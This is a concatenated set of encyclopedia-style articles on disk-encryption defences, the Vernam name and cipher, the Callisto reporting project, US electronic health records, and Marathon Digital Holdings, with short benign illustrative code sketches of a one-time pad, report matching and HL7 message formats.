CPU-based disk encryption systems, such as TRESOR and Loop-Amnesia, prevent data from being vulnerable to a DMA attack by ensuring it does not leak into system memory. TPM-based secure boot has been shown to mitigate evil maid attacks by authenticating the device to the user. It does this by unlocking itself only if the correct password is given by the user and if it measures that no unauthorized code has been executed on the device. These measurements are done by root of trust systems, such as Microsoft's BitLocker and Intel's TXT technology. The Anti Evil Maid program builds upon TPM-based secure boot and further attempts to authenticate the device to the user. See also Cold boot attack References Computer security exploits Spyware Cyberwarfare Security breaches
58607025
https://en.wikipedia.org/wiki/Vernam
Vernam
Vernam is a surname. Notable people with the surname include: Charles Vernam (born 1996), English professional footballer Gilbert Vernam (1890–1960), inventor of an additive polyalphabetic stream cipher and later co-inventor of an automated one-time pad cipher Remington D. B. Vernam (1896–1918), American pilot and World War I flying ace Remington Vernam (land developer) (1843–1907), American lawyer and real-estate developer from New York, founder of the community of Arverne See also Vernam Field, former World War II United States Army Air Forces airfield in Clarendon Parish, west-south-west of Kingston, Jamaica Vernam cipher, an encryption technique that cannot be cracked, but needs a one-time pre-shared key at least as long as the message being sent Enam (disambiguation) Erna (disambiguation) Vena (disambiguation) Vera (disambiguation) Verna (disambiguation)
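The Vernam cipher listed above admits a very short illustration: ciphertext is the byte-wise XOR of the message with a random key at least as long as the message, and applying the same XOR again recovers the plaintext. A minimal sketch (function names are invented for this example):

```python
import secrets

def vernam_encrypt(message: bytes, key: bytes) -> bytes:
    """XOR each message byte with the corresponding key byte (one-time pad)."""
    if len(key) < len(message):
        raise ValueError("key must be at least as long as the message")
    return bytes(m ^ k for m, k in zip(message, key))

# Decryption is the same operation, since (m ^ k) ^ k == m.
vernam_decrypt = vernam_encrypt

plaintext = b"ATTACK AT DAWN"
key = secrets.token_bytes(len(plaintext))  # random, used once, never reused
ciphertext = vernam_encrypt(plaintext, key)
assert vernam_decrypt(ciphertext, key) == plaintext
```

The unbreakability claim holds only under the one-time pad conditions: the key is truly random, as long as the message, kept secret, and never reused.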
58627038
https://en.wikipedia.org/wiki/Callisto%20%28project%29
Callisto (project)
Callisto is a nonprofit organization project aimed at allowing individuals to anonymously report sexual assault. Created by Jessica Ladd, the organization has developed a website that allows users to submit a time-stamped record of the alleged offense and, if another individual files a report about the same perpetrator, will alert the authorities. The site uses third-party encryption software to flag the reports of the victims. Since its release, Callisto has received criticism for its policies towards reporting to authorities and over concerns of its database being hacked. The Process When users report alleged assaults, they have the opportunity to be in an environment they feel comfortable in. Reporters are encouraged to take breaks so that they do not become overwhelmed. The report does not have to be in chronological order. No one is able to access the report unless the filer grants access. Once the report has been submitted, there are three possible outcomes. The system notifies the authorities, as well as the college, only if two victims report the same assailant. The reporter may forward the record to the school. Or, if the victim chooses, they may take the report to the authorities themselves. Reception Callisto is considered a tool in helping to reduce sexual assault. Other methods for reducing this crime include an online sexual assault course that colleges require students to take, apps that students can download to tell them local crime hot spots, and more. Most colleges have “blue light poles” in case of emergency, and have a night ride service so that no one has to walk alone. Callisto’s biggest competitor is Lighthouse. Callisto’s approach to reporting is sensitive to trauma. Callisto had an app at one point, but took it down so that there was no shame in having it on one's phone. It is now offered only online, 24/7, so it is easily accessible and confidential. Callisto believes that there is safety in numbers and that no one is alone.
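The two-report matching rule described above can be sketched as a simple information escrow: each report stores a digest of a perpetrator identifier, and nothing is released until a second, distinct reporter names the same identifier. This is only an illustrative toy under stated assumptions; Callisto's actual system relies on third-party encryption rather than a plain in-memory table, and all names here are invented:

```python
import hashlib
from collections import defaultdict

class MatchingEscrow:
    """Toy escrow: trigger notification only when >= 2 reporters match."""

    def __init__(self):
        # hashed perpetrator identifier -> list of distinct reporter ids
        self._reports = defaultdict(list)

    def submit(self, reporter_id: str, perpetrator_identifier: str) -> bool:
        """Record a report; return True when a match triggers notification."""
        digest = hashlib.sha256(perpetrator_identifier.lower().encode()).hexdigest()
        reporters = self._reports[digest]
        if reporter_id not in reporters:
            reporters.append(reporter_id)
        return len(reporters) >= 2  # two victims named the same assailant

escrow = MatchingEscrow()
print(escrow.submit("victim-A", "attacker@example.com"))  # held in escrow
print(escrow.submit("victim-B", "attacker@example.com"))  # match found
```

Storing only a digest means the table alone does not reveal who was named, though, as the Criticism section notes, a real deployment must also protect the reports themselves.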
Criticism Since the data collected by Callisto is stored on a database by a third party, critics worry that this information could potentially be hacked and the victims' identities revealed. Reporting to Callisto is also no guarantee that a case will be investigated: since there must be at least one match to alert the authorities, cases that never get matched will never be investigated through Callisto. Callisto asks victims to produce some form of identification of the perpetrator when reporting, such as the perpetrator's Facebook page, email, or phone number. Analysts do not like this aspect of the website, as gathering personal information about the attacker could be overwhelming, or even trigger the victim. Callisto could also be accused of crowd-sourcing, taking away from the individual and their story. References External links Sexual violence
58751479
https://en.wikipedia.org/wiki/Electronic%20health%20records%20in%20the%20United%20States
Electronic health records in the United States
Federal and state governments, insurance companies, and other large medical institutions are heavily promoting the adoption of electronic health records. The US Congress included a formula of both incentives (up to $44,000 per physician under Medicare, or up to $65,000 over six years under Medicaid) and penalties (i.e. decreased Medicare and Medicaid reimbursements to doctors who fail to use EMRs by 2015, for covered patients) for EMR/EHR adoption versus continued use of paper records as part of the Health Information Technology for Economic and Clinical Health (HITECH) Act, enacted as part of the American Recovery and Reinvestment Act of 2009. The 21st Century Cures Act, passed in 2016, prohibited information blocking, which had slowed interoperability. In 2018, the Trump administration announced the MyHealthEData initiative to further allow for patients to receive their health records. The federal Office of the National Coordinator for Health Information Technology leads these efforts. One VA study estimates its electronic medical record system may improve overall efficiency by 6% per year, and the monthly cost of an EMR may (depending on the cost of the EMR) be offset by the cost of only a few "unnecessary" tests or admissions. Jerome Groopman disputed these results, publicly asking "how such dramatic claims of cost-saving and quality improvement could be true". A 2014 survey of the American College of Physicians member sample, however, found that family practice physicians spent 48 minutes more per day when using EMRs. 90% reported that at least 1 data management function was slower after EMRs were adopted, and 64% reported that note writing took longer. A third (34%) reported that it took longer to find and review medical record data, and 32% reported that it was slower to read other clinicians' notes. Coverage In a 2008 survey by DesRoches et al.
of 4484 physicians (62% response rate), 83% of all physicians, 80% of primary care physicians, and 86% of non-primary care physicians had no EHRs. "Among the 83% of respondents who did not have electronic health records, 16%" had bought, but not yet implemented, an EHR system. The 2009 National Ambulatory Medical Care Survey of 5200 physicians (70% response rate) by the National Center for Health Statistics showed that 51.7% of office-based physicians did not use any EMR/EHR system. In the United States, the CDC reported that the EMR adoption rate had steadily risen to 48.3 percent at the end of 2009. This is an increase over 2008, when only 38.4% of office-based physicians reported using fully or partially electronic medical record systems (EMR). However, the same study found that only 20.4% of all physicians reported using a system described as minimally functional and including the following features: orders for prescriptions, orders for tests, viewing laboratory or imaging results, and clinical progress notes. As of 2013, 78 percent of office physicians were using basic electronic medical records. As of 2014, more than 80 percent of hospitals in the U.S. had adopted some type of EHR, though the type and mix of EHR data varies significantly within a hospital. Types of EHR data used in hospitals include structured data (e.g., medication information) and unstructured data (e.g., clinical notes). The healthcare industry spends only 2% of gross revenues on Health Information Technology (HIT), which is low compared to other information-intensive industries such as finance, which spend upwards of 10%. The usage of electronic medical records can vary depending on who the user is and how they are using it. Electronic medical records can help improve the quality of medical care given to patients. Many doctors and office-based physicians refuse to get rid of traditional paper records.
Harvard University has conducted an experiment in which they tested how doctors and nurses use electronic medical records to keep their patients' information up to date. The studies found that electronic medical records were very useful; a doctor or a nurse was able to find a patient's information quickly and easily just by typing their name, even if it was misspelled. The usage of electronic medical records increases in some workplaces due to the ease of use of the system, whereas the president of the Canadian Family Practice Nurses Association says that using electronic medical records can be time-consuming and not very helpful due to the complexity of the system. Beth Israel Deaconess Medical Center reported that doctors and nurses prefer much more user-friendly software, due to the difficulty and time it takes for medical staff to input as well as to find a patient's information. One study measured how much patient information was recorded in EMRs and found that only about 44% of it was, suggesting that EMRs are often incomplete. The cost of implementing an EMR system for smaller practices has also been criticized; data produced by the Robert Wood Johnson Foundation demonstrates that the first-year investment for an average five-person practice is $162,000, followed by about $85,000 in maintenance fees. Despite this, tighter regulations regarding meaningful use criteria and national laws (the Health Information Technology for Economic and Clinical Health Act and the Affordable Care Act) have resulted in more physicians and facilities adopting EMR systems: Software, hardware and other services for EMR system implementation are provided at cost by various companies, including Dell. Open-source EMR systems exist but have not seen widespread adoption.
Beyond financial concerns, there are a number of legal and ethical dilemmas created by increasing EMR use, including the risk of medical malpractice due to user error, server glitches that result in the EMR not being accessible, and increased vulnerability to hackers. Legal status Electronic medical records, like other medical records, must be kept in unaltered form and authenticated by the creator. Under data protection legislation, the responsibility for patient records (irrespective of the form they are kept in) is always on the creator and custodian of the record, usually a health care practice or facility. This role has been said to require changes such that the sole medico-legal record should be held elsewhere. The physical medical records are the property of the medical provider (or facility) that prepares them. This includes films and tracings from diagnostic imaging procedures such as X-ray, CT, PET, MRI, ultrasound, etc. The patient, however, according to HIPAA, has a right to view the originals, and to obtain copies under law. The Health Information Technology for Economic and Clinical Health Act (HITECH) (§2.A.III & B.4) (a part of the 2009 stimulus package) set meaningful use of interoperable EHR adoption in the health care system as a critical national goal and incentivized EHR adoption. The "goal is not adoption alone but 'meaningful use' of EHRs—that is, their use by providers to achieve significant improvements in care." Title IV of the act promises maximum incentive payments for Medicaid to those who adopt and use "certified EHRs" of $63,750 over 6 years beginning in 2011. Eligible professionals must begin receiving payments by 2016 to qualify for the program. For Medicare the maximum payments are $44,000 over 5 years. Doctors who do not adopt an EHR by 2015 will be penalized 1% of Medicare payments, increasing to 3% over 3 years. In order to receive the EHR stimulus money, the HITECH Act requires doctors to show "meaningful use" of an EHR system.
As of June 2010, there were no penalty provisions for Medicaid. In 2017 the government announced its first False Claims Act settlement with an electronic health records vendor for misrepresenting its ability to meet “meaningful use” standards and therefore receive incentive payments. eClinicalWorks paid $155 million to settle charges that it had failed to meet all government requirements, failed to adequately test its software, failed to fix certain bugs, failed to ensure data portability, and failed to reliably record laboratory and diagnostic imaging orders. The government also alleged that eClinicalWorks paid kickbacks to influential customers who recommended its products. The case marks the first time the government applied the federal Anti-Kickback Statute law to the promotion and sale of an electronic health records system. The False Claims Act lawsuit was brought by a whistleblower who was a New York City employee implementing eClinicalWorks’ system at Rikers Island Correctional Facility when he became aware of the software flaws. His “qui tam” case was later joined by the government. Notably, CMS has said it will not punish eClinicalWorks clients that "in good faith" attested to using the software. Health information exchange (HIE) has emerged as a core capability for hospitals and physicians to achieve "meaningful use" and receive stimulus funding. Healthcare vendors are pushing HIE as a way to allow EHR systems to pull disparate data and function on a more interoperable level. Starting in 2015, hospitals and doctors will be subject to financial penalties under Medicare if they are not using electronic health records. 
Goals and objectives Improve care quality, safety, efficiency, and reduce health disparities Quality and safety measurement Clinical decision support (automated advice) for providers Patient registries (e.g., "a directory of patients with diabetes") Improve care coordination Engage patients and families in their care Improve population and public health Electronic laboratory reporting for reportable conditions (hospitals) Immunization reporting to immunization registries Syndromic surveillance (health event awareness) Ensure adequate privacy and security protections Quality Studies call into question whether, in real life, EMRs improve the quality of care. Several articles published in 2009 raised doubts about EMR benefits. A major concern is the reduction of physician-patient interaction due to formatting constraints. For example, some doctors have reported that the use of check-boxes has led to fewer open-ended questions. Meaningful use The main components of meaningful use are: The use of a certified EHR in a meaningful manner, such as e-prescribing. The use of certified EHR technology for the electronic exchange of health information to improve the quality of health care. The use of certified EHR technology to submit clinical quality and other measures. In other words, providers need to show they're using certified EHR technology in ways that can be measured significantly in quality and in quantity.
The meaningful use of EHRs intended by the US government incentives is categorized as follows: Improve care coordination Reduce healthcare disparities Engage patients and their families Improve population and public health Ensure adequate privacy and security The Obama Administration's Health IT program intends to use federal investments to stimulate the market of electronic health records: Incentives: to providers who use IT Strict and open standards: To ensure users and sellers of EHRs work towards the same goal Certification of software: To provide assurance that the EHRs meet basic quality, safety, and efficiency standards The detailed definition of "meaningful use" is to be rolled out in 3 stages over a period of time until 2017. Details of each stage are hotly debated by various groups. Meaningful use Stage 1 The first steps in achieving meaningful use are to have a certified electronic health record (EHR) and to be able to demonstrate that it is being used to meet the requirements. Stage 1 contains 25 objectives/measures for Eligible Providers (EPs) and 24 objectives/measures for eligible hospitals. The objectives/measures have been divided into a core set and menu set. EPs and eligible hospitals must meet all objectives/measures in the core set (15 for EPs and 14 for eligible hospitals). EPs must meet 5 of the 10 menu-set items during Stage 1, one of which must be a public health objective. Full list of the Core Requirements and a full list of the Menu Requirements. Core Requirements: Use computerized order entry for medication orders. Implement drug-drug, drug-allergy checks. Generate and transmit permissible prescriptions electronically. Record demographics. Maintain an up-to-date problem list of current and active diagnoses. Maintain active medication list. Maintain active medication allergy list. Record and chart changes in vital signs. Record smoking status for patients 13 years old or older. Implement one clinical decision support rule. 
Report ambulatory quality measures to CMS or the States. Provide patients with an electronic copy of their health information upon request. Provide clinical summaries to patients for each office visit. Capability to exchange key clinical information electronically among providers and patient authorized entities. Protect electronic health information (privacy & security) Menu Requirements: Implement drug-formulary checks. Incorporate clinical lab-test results into certified EHR as structured data. Generate lists of patients by specific conditions to use for quality improvement, reduction of disparities, research, and outreach. Send reminders to patients per patient preference for preventive/ follow-up care Provide patients with timely electronic access to their health information (including lab results, problem list, medication lists, allergies) Use certified EHR to identify patient-specific education resources and provide to the patient if appropriate. Perform medication reconciliation as relevant Provide a summary care record for transitions in care or referrals. Capability to submit electronic data to immunization registries and actual submission. Capability to provide electronic syndromic surveillance data to public health agencies and actual transmission. To receive federal incentive money, CMS requires participants in the Medicare EHR Incentive Program to "attest" that during a 90-day reporting period, they used a certified EHR and met Stage 1 criteria for meaningful use objectives and clinical quality measures. For the Medicaid EHR Incentive Program, providers follow a similar process using their state's attestation system. Meaningful use Stage 2 The government released its final ruling on achieving Stage 2 of meaningful use in August 2012. Eligible providers will need to meet 17 of 20 core objectives in Stage 2, and fulfill three out of six menu objectives. 
The required percentage of patient encounters that meet each objective has generally increased over the Stage 1 objectives. While Stage 2 focuses more on information exchange and patient engagement, many large EHR systems have this type of functionality built into their software, making it easier to achieve compliance. Also, for those eligible providers who have successfully attested to Stage 1, meeting Stage 2 should not be as difficult, as it builds incrementally on the requirements for the first stage. Meaningful use Stage 3 On March 20, 2015, CMS released its proposed rule for Stage 3 meaningful use. These new rules focus on some of the tougher aspects of Stage 2 and require healthcare providers to vastly improve their EHR adoption and care delivery by 2018. Barriers to adoption Costs The price of EMRs and provider uncertainty regarding the value they will derive from adoption in the form of return on investment have a significant influence on EMR adoption. In a project initiated by the Office of the National Coordinator for Health Information, surveyors found that hospital administrators and physicians who had adopted EMR noted that any gains in efficiency were offset by reduced productivity as the technology was implemented, as well as the need to increase information technology staff to maintain the system. The U.S. Congressional Budget Office concluded that the cost savings may occur only in large integrated institutions like Kaiser Permanente, and not in small physician offices. They challenged the Rand Corporation's estimates of savings. Office-based physicians in particular may see no benefit if they purchase such a product—and may even suffer financial harm. Even though the use of health IT could generate cost savings for the health system at large that might offset the EMR's cost, many physicians might not be able to reduce their office expenses or increase their revenue sufficiently to pay for it. For example,
the use of health IT could reduce the number of duplicated diagnostic tests. However, that improvement in efficiency would be unlikely to increase the income of many physicians. ...Given the ease at which information can be exchanged between health IT systems, patients whose physicians use them may feel that their privacy is more at risk than if paper records were used. Doubts have been raised about cost saving from EMRs by researchers at Harvard University, the Wharton School of the University of Pennsylvania, Stanford University, and others. Start-up costs In a survey by DesRoches et al. (2008), 66% of physicians without EHRs cited capital costs as a barrier to adoption, while 50% were uncertain about the investment. Around 56% of physicians without EHRs stated that financial incentives to purchase and/or use EHRs would facilitate adoption. In 2002, initial costs were estimated to be $50,000–70,000 per physician in a 3-physician practice. Since then, costs have decreased with increasing adoption. A 2011 survey estimated a cost of $32,000 per physician in a 5-physician practice during the first 60 days of implementation. One case study by Miller et al. (2005) of 14 small primary-care practices found that the average practice paid for the initial and ongoing costs within 2.5 years. A 2003 cost-benefit analysis found that using EMRs for 5 years created a net benefit of $86,000 per provider. Some physicians are skeptical of the positive claims and believe the data is skewed by vendors and others with an interest in EHR implementation. Brigham and Women's Hospital in Boston, Massachusetts, estimated it achieved net savings of $5 million to $10 million per year following installation of a computerized physician order entry system that reduced serious medication errors by 55 percent. 
Another large hospital generated about $8.6 million in annual savings by replacing paper medical charts with EHRs for outpatients and about $2.8 million annually by establishing electronic access to laboratory results and reports. Maintenance costs Maintenance costs can be high. Miller et al. found the average estimated maintenance cost was $8,500 per FTE health-care provider per year. Furthermore, software technology advances at a rapid pace. Most software systems require frequent updates, sometimes even server upgrades, and often at a significant ongoing cost. Some types of software and operating systems require full-scale re-implementation periodically, which disrupts not only the budget but also workflow. Costs for upgrades and associated regression testing can be particularly high where the applications are governed by FDA regulations (e.g. clinical laboratory systems). Physicians desire modular upgrades and the ability to continually customize, without large-scale reimplementation. Training costs Training of employees to use an EHR system is costly, just as training in the use of any other hospital system is. New employees, permanent or temporary, will also require training as they are hired. In the United States, a substantial majority of healthcare providers train at a VA facility sometime during their career. With the widespread adoption of the Veterans Health Information Systems and Technology Architecture (VistA) electronic health record system at all VA facilities, fewer recently trained medical professionals will be inexperienced in electronic health record systems. Older practitioners who are less experienced in the use of electronic health record systems will retire over time. Software quality and usability deficiencies The Healthcare Information and Management Systems Society, a very large U.S.
health care IT industry trade group, observed that EMR adoption rates "have been slower than expected in the United States, especially in comparison to other industry sectors and other developed countries. A key reason, aside from initial costs and lost productivity during EMR implementation, is lack of efficiency and usability of EMRs currently available." The U.S. National Institute of Standards and Technology of the Department of Commerce studied usability in 2011 and lists a number of specific issues that have been reported by health care workers. The U.S. military's EMR "AHLTA" was reported to have significant usability issues. Lack of semantic interoperability In the United States, there are no standards for semantic interoperability of health care data; there are only syntactic standards. This means that while data may be packaged in a standard format (using the pipe notation of HL7, or the bracket notation of XML), it lacks definition, or linkage to a common shared dictionary. The addition of layers of complex information models (such as the HL7 v3 RIM) does not resolve this fundamental issue. As of 2018, Fast Healthcare Interoperability Resources was a leading interoperability standard, and the Argonaut Project is a privately sponsored interoperability initiative. In 2017, Epic Systems announced Share Everywhere, which lets providers access medical information through a portal; their platform was described as "closed" in 2014, with competitors sponsoring the CommonWell Health Alliance. The economics of sharing have been blamed for the lack of interoperability, as limited data sharing can help providers retain customers. Implementations In the United States, the Department of Veterans Affairs (VA) has the largest enterprise-wide health information system that includes an electronic medical record, known as the Veterans Health Information Systems and Technology Architecture (VistA). 
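The syntactic-versus-semantic distinction discussed above (pipe-delimited HL7 v2 versus bracketed XML) can be made concrete with a small sketch. Both message fragments below are simplified, illustrative examples rather than conformant output from any real system, and the LOINC-style code is used only to show where a shared dictionary would come in:

```python
# Two syntactically standard renderings of the same lab observation.
# Both are illustrative, simplified fragments, not conformant messages.

hl7_v2 = "OBX|1|NM|2345-7^Glucose^LN||95|mg/dL|70-99|N"  # HL7 v2 pipe notation
xml_doc = "<observation><code>2345-7</code><value unit='mg/dL'>95</value></observation>"

# Parsing either format is mechanical (syntactic interoperability)...
fields = hl7_v2.split("|")
value, unit = fields[5], fields[6]

# ...but nothing in the format itself guarantees that two systems agree on
# what code "2345-7" means; that shared meaning (semantic interoperability)
# requires a common dictionary, such as an agreed code system.
```

The point of the sketch is that the data is easy to unpack in both notations, yet the meaning of each field still depends on a vocabulary agreed on outside the message format.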
A key component of VistA is its VistA Imaging System, which provides comprehensive multimedia data from many specialties, including cardiology, radiology, and orthopedics. A graphical user interface known as the Computerized Patient Record System (CPRS) allows health care providers to review and update a patient's electronic medical record at any of the VA's over 1,000 healthcare facilities. CPRS includes the ability to place orders, including medications, special procedures, X-rays, patient care nursing orders, diets, and laboratory tests. The 2003 National Defense Authorization Act (NDAA) ensured that the VA and DoD would work together to establish a bidirectional exchange of reference-quality medical images. Initially, demonstrations were conducted only in El Paso, Texas, but capabilities have been expanded to six different locations of VA and DoD facilities. These facilities include VA polytrauma centers in Tampa and Richmond, Denver, North Chicago, Biloxi, and the National Capital Area medical facilities. Radiological images such as CT scans, MRIs, and X-rays are being shared using the BHIE. Goals of the VA and DoD in the near future are to use several image sharing solutions (VistA Imaging and the DoD Picture Archiving & Communications System (PACS) solutions). The Clinical Data Repository/Health Data Repository (CHDR) is a database that allows for the sharing of patient records, especially allergy and pharmaceutical information, between the Department of Veterans Affairs (VA) and the Department of Defense (DoD) in the United States. The program shares data by translating the various vocabularies of the information being transmitted, allowing all of the VA facilities to access and interpret the patient records. The Laboratory Data Sharing and Interoperability (LDSI) application is a new program being implemented to allow sharing at certain sites between the VA and DoD of "chemistry and hematology laboratory tests".
Unlike the CHDR, the LDSI is currently limited in its scope. One contributing factor to the start of implementing EHRs in the States is the development of the Nationwide Health Information Network, which is still a work in progress. This started with the North Carolina Healthcare Information and Communication Alliance, founded in 1994, which received funding from the Department of Health and Human Services. The Department of Veterans Affairs and Kaiser Permanente have a pilot program to share health records between their systems, VistA and HealthConnect, respectively. This software, called CONNECT, uses Nationwide Health Information Network standards and governance to make sure that health information exchanges are compatible with other exchanges being set up throughout the country. CONNECT is an open-source software solution that supports electronic health information exchange. The CONNECT initiative is a Federal Health Architecture project that was conceived in 2007 and initially built by 20 various federal agencies; it now comprises more than 500 organizations, including federal agencies, states, healthcare providers, insurers, and health IT vendors. The US Indian Health Service uses an EHR similar to VistA called RPMS. VistA Imaging is also being used to integrate images and coordinate PACS into the EHR system. In Alaska, use of the EHR by the Kodiak Area Native Association has improved screening services and helped the organization reach all 21 clinical performance measures defined by the Indian Health Service as required by the Government Performance and Results Act. Privacy and confidentiality In the United States in 2011 there were 380 major data breaches involving 500 or more patients' records listed on the website kept by the United States Department of Health and Human Services (HHS) Office for Civil Rights.
So far, from the first wall postings in September 2009 through the latest on 8 December 2012, there have been 18,059,831 "individuals affected," and even that massive number is an undercount of the breach problem, since the civil rights office has not released the records of the tens of thousands of breaches it has received under a federal reporting mandate covering breaches affecting fewer than 500 patients per incident. Privacy concerns in healthcare apply to both paper and electronic records. According to the Los Angeles Times, roughly 150 people (from doctors and nurses to technicians and billing clerks) have access to at least part of a patient's records during a hospitalization, and 600,000 payers, providers and other entities that handle providers' billing data have some access also. Recent revelations of "secure" data breaches at centralized data repositories, in banking and other financial institutions, in the retail industry, and from government databases, have caused concern about storing electronic medical records in a central location. Records that are exchanged over the Internet are subject to the same security concerns as any other type of data transaction over the Internet. The Health Insurance Portability and Accountability Act (HIPAA) was passed in the US in 1996 to establish rules for access, authentication, storage and auditing, and transmittal of electronic medical records. This standard made restrictions for electronic records more stringent than those for paper records. However, there are concerns as to the adequacy of these standards. In the United States, information in electronic medical records is referred to as Protected Health Information (PHI) and its management is addressed under the Health Insurance Portability and Accountability Act (HIPAA) as well as many local laws.
HIPAA protects a patient's information; the information protected under this act includes information doctors and nurses enter into the electronic medical record, conversations between a doctor and a patient that may have been recorded, and billing information. Under this act there is a limit as to how much information can be disclosed, as well as who can see a patient's information. Patients may also obtain a copy of their records if they desire, and are notified if their information is ever shared with third parties. Covered entities may disclose protected health information to law enforcement officials for law enforcement purposes as required by law (including court orders, court-ordered warrants, subpoenas) and administrative requests; or to identify or locate a suspect, fugitive, material witness, or missing person. Medical and health care providers experienced 767 security breaches resulting in the compromised confidential health information of 23,625,933 patients during the period of 2006–2012. One major issue that has arisen concerning the privacy of the US network for electronic health records is the strategy to secure the privacy of patients. Former US president George W. Bush called for the creation of networks, but federal investigators report that there is no clear strategy to protect the privacy of patients as the promotion of electronic medical records expands throughout the United States. In 2007, the Government Accountability Office reported that there is a "jumble of studies and vague policy statements but no overall strategy to ensure that privacy protections would be built into computer networks linking insurers, doctors, hospitals and other health care providers." The privacy threat posed by the interoperability of a national network is a key concern. One of the most vocal critics of EMRs, New York University Professor Jacob M.
Appel, has claimed that the number of people who will need to have access to such a truly interoperable national system, which he estimates to be 12 million, will inevitably lead to breaches of privacy on a massive scale. Appel has written that while "hospitals keep careful tabs on who accesses the charts of VIP patients," they are powerless to act against "a meddlesome pharmacist in Alaska" who "looks up the urine toxicology on his daughter's fiance in Florida, to check if the fellow has a cocaine habit." This is a significant barrier to the adoption of an EHR. Accountability among all the parties that are involved in the processing of electronic transactions, including the patient, physician office staff, and insurance companies, is the key to successful advancement of the EHR in the US. Supporters of EHRs have argued that there needs to be a fundamental shift in "attitudes, awareness, habits, and capabilities in the areas of privacy and security" of individuals' health records if adoption of an EHR is to occur. According to The Wall Street Journal, the DHHS takes no action on complaints under HIPAA, and medical records are disclosed under court orders in legal actions such as claims arising from automobile accidents. HIPAA has special restrictions on psychotherapy records, but psychotherapy records can also be disclosed without the client's knowledge or permission, according to the Journal. For example, Patricia Galvin, a lawyer in San Francisco, saw a psychologist at Stanford Hospital & Clinics after her fiance committed suicide. Her therapist had assured her that her records would be confidential. But after she applied for disability benefits, Stanford gave the insurer her therapy notes, and the insurer denied her benefits based on what Galvin claims was a misinterpretation of the notes. Within the private sector, many companies are moving forward in the development, establishment, and implementation of medical record banks and health information exchange.
By law, companies are required to follow all HIPAA standards and adopt the same information-handling practices that have been in effect for the federal government for years. This includes two ideas: standardized formatting of electronically exchanged data and federalization of security and privacy practices in the private sector. Private companies have promised to have "stringent privacy policies and procedures." If protection and security are not part of the systems developed, people will not trust the technology nor will they participate in it. There is also debate over ownership of data, where private companies tend to value and protect data rights, but the patients referenced in these records may not have knowledge that their information is being used for commercial purposes. In 2013, reports based on documents released by Edward Snowden revealed that the NSA had succeeded in breaking the encryption codes protecting electronic health records, among other databases. In 2015, 4.5 million health records were hacked at UCLA Medical Center. In 2018, Social Indicators Research published evidence that 173,398,820 (over 173 million) individuals in the US were affected from October 2008 (when data collection began) to September 2017 (when the statistical analysis took place). Regulatory compliance Health Level 7 In the United States, reimbursement for many healthcare services is based upon the extent to which specific work by healthcare providers is documented in the patient's medical record. Enforcement authorities in the United States have become concerned that functionality available in many electronic health records, especially copy-and-paste, may enable fraudulent claims for reimbursement. The authorities are concerned that healthcare providers may easily use these systems to create documentation of medical care that did not actually occur. These concerns came to the forefront in 2012, in a joint letter from the U.S.
Departments of Justice and Health and Human Services to the American hospital community. The American Hospital Association responded, focusing on the need for clear guidance from the government regarding permissible and prohibited conduct using electronic health records. In December 2013, the U.S. HHS Office of Inspector General (OIG) issued an audit report reiterating that vulnerabilities continue to exist in the operation of electronic health records. The OIG's 2014 Workplan indicates an enhanced focus on providers' use of electronic health records. Medical data breach The Security Rule, according to Health and Human Services (HHS), establishes a security framework for small practices as well as large institutions. All covered entities must have a written security plan. The HHS identifies three components as necessary for the security plan: administrative safeguards, physical safeguards, and technical safeguards. However, medical and healthcare providers have experienced 767 security breaches resulting in the compromised confidential health information of 23,625,933 patients during the period of 2006–2012. The Health Insurance Portability and Accountability Act requires safeguards to limit the number of people who have access to personal information. However, given the number of people who may have access to a patient's information as part of the operations and business of the health care provider or plan, there is no realistic way to estimate the number of people who may come across a patient's records. Additionally, law enforcement access is authorized under the act. In some cases, medical information may be disclosed without a warrant or court order. Breach notification The Security Rule that was adopted in 2005 did not require breach notification. However, notice might be required by state laws that apply to a variety of industries, including health care providers.
In California, a law in place since 2003 meant that a HIPAA-covered organization's breach could trigger a notice even though notice was not required by the HIPAA Security Rule. Since 1 January 2009, California residents are required to receive notice of a health information breach. Federal law and regulations now provide rights to notice of a breach of health information. The Health Information Technology for Economic and Clinical Health (HITECH) Act requires HHS and the Federal Trade Commission (FTC) to jointly study and report on privacy and data security of personal health information. HITECH also requires the agencies to issue breach notification rules that apply to HIPAA covered entities and Web-based vendors that store health information electronically. The FTC has adopted rules regarding breach notification for internet-based vendors. Vendors Vendors often focus on software for specific healthcare settings, such as acute care hospitals or ambulatory care. In the hospital market, Epic, Cerner, MEDITECH, and CSPI (Evident Thrive) had the top market shares, at 28%, 26%, 9%, and 6% respectively, in 2018. For large hospitals with over 500 beds, Epic and Cerner had over 85% market share in 2019. In ambulatory care, Practice Fusion had the highest satisfaction, while in acute hospital care Epic scored relatively well. Interoperability is a focus for systems; in 2018, Epic and athenahealth were rated highly for interoperability. Interoperability has been lacking, but is enhanced by certain compatibility features (e.g., Epic interoperates with itself via CareEverywhere) or in some cases regional or national networks, such as EHealth Exchange, CommonWell Health Alliance, and Carequality. Vendors may use anonymized data for their own business or research purposes; for example, as of 2019 Cerner and AWS had partnered on a machine learning tool using such data.
History As of 2006, systems with computerized provider order entry (CPOE) had existed for more than 30 years, but by 2006 only 10% of hospitals had a fully integrated system. See also iMedicor Electronic health record References Healthcare in the United States Electronic health records
58812518
https://en.wikipedia.org/wiki/Marathon%20Digital%20Holdings
Marathon Digital Holdings
Marathon Digital Holdings, Inc. is a digital asset technology company that engages in mining cryptocurrencies, with a focus on the blockchain ecosystem and the generation of digital assets. The company was founded on February 23, 2010, and is headquartered in Las Vegas, NV. The company was formerly known as Marathon Patent Group, a patent holding company and the parent of Uniloc, an alleged patent troll. Marathon purchased patents related to encryption in the 2010s, and in 2021 it was known for its purchases of bitcoin and bitcoin mining equipment and for a joint venture to use 37 MW from the Hardin Generating Station, a Montana coal plant, to power an adjacently constructed Marathon bitcoin data center. The company changed its name to Marathon Digital Holdings, effective March 1, 2021. Its chief executive officer is Fred Thiel. Subsidiaries Marathon has several subsidiaries. See also Uniloc v. Microsoft Uniloc References Companies listed on the Nasdaq Patent monetization companies of the United States
58926597
https://en.wikipedia.org/wiki/Wahlwort
Wahlwort
